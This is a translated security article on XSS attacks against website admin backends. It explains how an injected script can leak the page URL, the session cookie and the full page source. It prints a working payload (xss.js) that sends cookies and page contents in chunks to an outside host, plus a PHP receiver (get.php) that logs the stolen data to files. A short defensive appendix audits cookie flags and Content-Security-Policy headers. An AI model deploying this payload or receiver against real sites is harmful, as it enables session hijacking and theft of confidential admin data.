Client-Attack of XSS


Original source: http://www.vul.kr/?p=158 (Evil Baboons), author: TTFCT

1. Why can the admin backend not be found during a penetration test?
2. Why is confidential information in the backend stolen when nobody else has logged in?
3. Why is there no trace of a login from a non-admin IP, even though the backend password is extremely complex and cannot be cracked?

The XSS client-attack described in this article is mainly about these three questions. A detailed description follows:

1. When the admin backend has an XSS flaw, the XSS payload can send the URL of the page the administrator is currently viewing to the receiver; this is implemented with location.href.
2. When the admin backend has an XSS flaw, although IE limits what can be grabbed in one go, the XSS payload can submit the source code of the administrator's current page to the receiver in several chunks; this is implemented with AJAX and document.documentElement.outerHTML (this is the point I focus on here).
3. When the admin backend has an XSS flaw, the XSS payload sends the administrator's login SESSION cookie to the receiver; when the backend's verification is lax, the attacker logs in to the backend directly with that cookie. This is implemented with document.cookie.

Here I want to go into point 2 in more detail. document.documentElement.outerHTML can be used directly to get the source code of the current page, so why AJAX? The reason is that using document.documentElement.outerHTML directly retrieves incomplete source code.

Example 1:

admin-1.html

This is source code
<script>
alert(document.documentElement.outerHTML)
</script>
How about this?

We find that the alert window does not contain "How about this?". The inline script runs while the page is still being parsed, so anything after the injected XSS code is not yet in the document and cannot be obtained this way; AJAX is therefore needed to fetch the complete file.
The exception is a page that the other party has saved locally, for example C:\users\administrator\desktop\data.htm; there document.documentElement.outerHTML has to be used to capture the page.

XSS source code:
------------------------------ xss.js ----------------------------------
// Beacon: load server + "get.php?" + doc as a <script>, so the query string reaches the receiver
function sd(doc) {
    send = document.createElement("script");
    send.src = server + "get.php?" + doc;
    send.type = "text/javascript";
    head.appendChild(send);
}
// Synchronous GET of u; returns the escaped response body
function ajax(u) {
    var xmlHttp;
    try {
        xmlHttp = new XMLHttpRequest();
    } catch (e) {
        try {
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {
            }
        }
    }
    xmlHttp.open("GET", u, false);
    xmlHttp.send(null);
    return escape(xmlHttp.responseText);
}

var doc = "";
var server = "http://www.vul.kr/";
var head = document.getElementsByTagName("head").item(0);

url = encodeURIComponent(location.href);
ck = encodeURIComponent(document.cookie);
sd("s=1&u=" + url + "&c=" + ck);   // step 1: current page URL and cookie

if (location.href.indexOf("file:") == -1)   // check whether the page is a local file
    doc = ajax(location.href);
else
    doc = escape(document.documentElement.outerHTML);

doclen = doc.length;
buflen = 2040;   // size of each submitted chunk
for (i = 0; i < doclen; i = i + buflen) {
    dstr = doc.substr(i, buflen);   // step 2: submit the source in chunks
    sd("s=2&d=" + dstr);
}
sd("s=3");   // step 3: end marker
----------------------------- end xss.js ----------------------------------

Receiver code:
-------------------------------- get.php ----------------------------------
<?php
$url = 0; $data = 0; $cookie = 0; $addr = 0;
$url = $_GET['u'];

if (strlen($_GET['c']) > 2) $cookie = $_GET['c'];
if (strlen($_GET['d']) > 2) $data = $_GET['d'];
if (strlen($_SERVER['REMOTE_ADDR']) > 2) $addr = $_SERVER['REMOTE_ADDR'];

$str = "<center><textarea name=textarea cols=150 rows=30>";
$str .= "URL:" . $url . " Cookie:" . $cookie . " Address:" . $addr . " Time:" . date("Y-m-d h:i:s", time());
if ($_GET['s'] == 1) w($str);                    // step 1: header line with URL, cookie, address and time

if ($_GET['s'] == 2) w(htmlentities($data));     // step 2: one chunk of the page source

if ($_GET['s'] == 3) w("</textarea></center>");  // step 3: close the textarea

// Append $d to dc/<remote address>.htm
function w($d) {
    $a = $_SERVER['REMOTE_ADDR'];
    @fwrite(@fopen("dc/" . $a . ".htm", "a+"), stripcslashes($d));
}
?>
-------------------- end get.php --------------------------------------------
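As an added example (not code from the original article or its author), the following Node.js check audits an admin page's response headers for the two defensive controls that interrupt the flow described above: the HttpOnly cookie flag, which keeps the session cookie out of document.cookie, and a Content-Security-Policy whose effective script-src blocks the external script beacon that sd() injects. The header sets and function names are my own constructed assumptions.

```javascript
// Added example, not from the original article. A session cookie without HttpOnly is
// readable via document.cookie (point 3); a missing or loose Content-Security-Policy lets
// the injected <script src="server/get.php?..."> beacon from sd() load (points 1 and 2).
// The synchronous XHR in ajax() fetches the page's own origin, so connect-src alone does not stop it.

function parseCsp(policy) {
  // "script-src 'self' cdn.example; default-src 'none'" -> { 'script-src': [...], ... }
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives[tokens[0].toLowerCase()] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return directives;
}

function auditCookie(setCookie) {
  const findings = [];
  const [nameValue, ...attrs] = setCookie.split(';').map((s) => s.trim());
  const name = nameValue.split('=')[0];
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  if (!flags.has('httponly')) findings.push(`${name}: no HttpOnly, readable via document.cookie`);
  if (!flags.has('secure')) findings.push(`${name}: no Secure flag`);
  if (!flags.has('samesite')) findings.push(`${name}: no SameSite attribute`);
  return findings;
}

// headers: lowercase header name -> value; 'set-cookie' is an array of values
function auditAdminHeaders(headers) {
  const findings = [];
  for (const c of headers['set-cookie'] || []) findings.push(...auditCookie(c));
  const csp = headers['content-security-policy'];
  if (!csp) return findings.concat(['no Content-Security-Policy: injected script tags load from any origin']);
  const d = parseCsp(csp);
  const scriptSrc = d['script-src'] || d['default-src'];   // default-src is the fallback for script-src
  if (!scriptSrc) {
    findings.push('CSP has neither script-src nor default-src');
  } else {
    const loose = scriptSrc.filter((s) => s === '*' || s === "'unsafe-inline'" || /^https?:$/.test(s));
    if (loose.length) findings.push(`effective script-src allows ${loose.join(' ')}: injected script not blocked`);
  }
  return findings;
}

// Constructed sample headers: a weak configuration and a hardened one
const WEAK_HEADERS = { 'set-cookie': ['PHPSESSID=abc123; Path=/'], 'content-security-policy': "default-src 'self' *" };
const HARDENED_HEADERS = { 'set-cookie': ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Strict'],
  'content-security-policy': "default-src 'none'; script-src 'self'; connect-src 'self'" };
```

auditAdminHeaders(WEAK_HEADERS) reports four findings (three cookie flags and the wildcard script source); auditAdminHeaders(HARDENED_HEADERS) reports none.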
